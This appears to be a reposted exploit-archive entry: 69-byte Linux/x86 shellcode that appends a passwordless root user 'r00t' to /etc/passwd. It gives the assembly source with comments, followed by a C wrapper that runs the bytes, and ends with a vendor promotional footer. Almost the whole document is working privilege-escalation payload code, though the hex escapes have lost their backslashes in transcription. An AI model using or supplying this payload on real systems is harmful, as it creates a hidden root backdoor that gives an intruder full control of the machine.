Linux/x86 shellcode to add root user with no password to /etc/passw
/* By Kris Katterjohn 11/14/2006
*
* 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
*
* for Linux/x86
*
*
*
* section .text
*
* global _start
*
* _start:
*
* ; open("/etc//passwd", O_WRONLY | O_APPEND)
*
* push byte 5
* pop eax
* xor ecx, ecx
* push ecx
* push 0x64777373
* push 0x61702f2f
* push 0x6374652f
* mov ebx, esp
* mov cx, 02001Q
* int 0x80
*
* mov ebx, eax
*
* ; write(ebx, "r00t::0:0:::", 12)
*
* push byte 4
* pop eax
* xor edx, edx
* push edx
* push 0x3a3a3a30
* push 0x3a303a3a
* push 0x74303072
* mov ecx, esp
* push byte 12
* pop edx
* int 0x80
*
* ; close(ebx)
*
* push byte 6
* pop eax
* int 0x80
*
* ; exit()
*
* push byte 1
* pop eax
* int 0x80
*/
main()
{
char shellcode[] =
"x6ax05x58x31xc9x51x68x73x73x77x64x68"
"x2fx2fx70x61x68x2fx65x74x63x89xe3x66"
"xb9x01x04xcdx80x89xc3x6ax04x58x31xd2"
"x52x68x30x3ax3ax3ax68x3ax3ax30x3ax68"
"x72x30x30x74x89xe1x6ax0cx5axcdx80x6a"
"x06x58xcdx80x6ax01x58xcdx80";
(*(void (*)()) shellcode)();
}
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo